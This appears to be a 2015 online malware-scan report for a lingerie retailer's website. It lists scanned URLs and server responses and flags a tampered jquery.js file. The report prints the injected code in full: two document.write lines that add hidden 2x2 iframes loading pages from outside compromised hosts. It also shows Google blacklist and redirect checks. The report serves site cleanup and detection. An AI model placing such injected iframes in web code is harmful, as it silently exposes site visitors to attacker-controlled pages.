Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=valentineloungewear.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.valentineloungewear.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 19 Jan 2015 23:03:26 GMT Location: http://valentineloungeweargroup.com/ Server: nginx Content-Length: 0 Content-Type: text/html Ngpass_ngall: 1 | clean |
http://valentineloungeweargroup.com/ | 200 OK Content-Length: 24061 Content-Type: text/html | clean |
http://valentineloungeweargroup.com/js/menu-jquery.js | 200 OK Content-Length: 57254 Content-Type: application/javascript | clean |
http://www.valentineloungewear.com/js/jquery-1.6.4.js | 404 Not Found Content-Length: 335 Content-Type: text/html | clean |
http://www.valentineloungewear.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.valentineloungewear.com/js/jquery-ui.js | 404 Not Found Content-Length: 332 Content-Type: text/html | clean |
http://www.valentineloungewear.com/js/jquery.js | 200 OK Content-Length: 57501 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://jmiller3d.com/zowf.html?j=685546></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=685546></iframe>'); (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}el ...[3398 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=685546 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=685546> Hidden iFrame found. size: 2x2 src: http://jmiller3d.com/zowf.html?j=685546 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://jmiller3d.com/zowf.html?j=685546> | ||
http://www.valentineloungewear.com/js/jquery_rt.js | 404 Not Found Content-Length: 332 Content-Type: text/html | clean |
http://www.valentineloungewear.com/js/rotate-min.js | 404 Not Found Content-Length: 333 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: valentineloungewear.com
Result:
GET / HTTP/1.1
Host: valentineloungewear.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: valentineloungewear.com
Referer: http://www.google.com/search?q=valentineloungewear.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: valentineloungewear.com
Referer: http://www.google.com/search?q=valentineloungewear.com
Result:
The result is similar to the first query. There are no suspicious redirects found.